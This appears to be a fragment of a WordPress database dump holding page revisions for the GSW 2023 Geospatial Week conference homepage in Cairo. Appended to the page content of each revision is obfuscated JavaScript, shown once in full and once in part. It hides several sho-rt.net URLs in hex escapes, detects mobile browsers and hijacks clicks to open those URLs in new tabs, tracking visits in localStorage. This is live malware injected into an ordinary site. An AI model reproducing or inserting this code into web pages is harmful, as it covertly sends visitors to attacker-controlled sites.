_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 18:06:57','2022-10-05 18:06:57','',2167,'https://gsw2023.com/?p=2300',0,'revision','',0),
(2301,1,'2022-10-05 18:07:16','2022-10-05 18:07:16','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQSUyMGp1c3RpZnklMjIlMjBjb2xvciUzRCUyMmJsYWNrJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-05 18:07:16','2022-10-05 18:07:16','',2167,'https://gsw2023.com/?p=2301',0,'revision','',0),
(2302,1,'2022-10-05 18:08:56','2022-10-05 18:08:56','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIyY29sb3IlM0FibGFjayUzQiUyMiUzRUFzJTIwd2UlMjBjZWxlYnJhdGUlMjBvdXIlMjA1MHRoJTIwYW5uaXZlcnNhcnklMkMlMjB0aGUlMjBBcmFiJTIwQWNhZGVteSUyMGZvciUyMFNjaWVuY2UlMkMlMjBUZWNobm9sb2d5JTJDJTIwYW5kJTIwTWFyaXRpbWUlMjBUcmFuc3BvcnQlMjAlMjhBQVNUTVQlMjklMjBpcyUyMGhvbm9yZWQlMjB0byUyMGhvc3QlMjB0aGUlMjBJU1BSUyUyMGZpcnN0JTIwR2Vvc3BhdGlhbCUyMFdlZWslMjBpbiUyMEFmcmljYSUyMGFuZCUyME1pZGRsZSUyMEVhc3QlMjBpbiUyMDIwMjMlMjAlMjhHU1ctMjAyMyUyOSUyMHRoYXQlMjB3aWxsJTIwYmUlMjBoZWxkJTIwdW5kZXIlMjB0aGUlMjBhdXNwaWNlcyUyMG9mJTIwSC5FJTIwU2VjcmV0YXJ5LUdlbmVyYWwlMjBvZiUyMHRoZSUyMExlYWd1ZSUyMG9mJTIwQXJhYiUyMFN0YXRlcy4lMjBUaGUlMjBjb25mZXJlbmNlJTIwd2lsbCUyMGJlJTIwaGVsZCUyMGluJTIwU2VwdGVtYmVyJTIwMjAyMyUyQyUyMGF0JTIwdGhlJTIwSW50ZXJDb250aW5lbnRhbCUyMENhaXJvJTIwQ2l0eSUyMHN0YXJzJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lMjBBQVNUTVQlMjBzdHJvbmdseSUyMGJlbGlldmVzJTIwdGhhdCUyMHNjaWVuY2UlMjBpcyUyMHRoZSUyMGtleSUyMHRvJTIwdGhlJTIwZnV0dXJlJTIwYW5kJTIwdGhlJTIwY29ybmVyc3RvbmUlMjB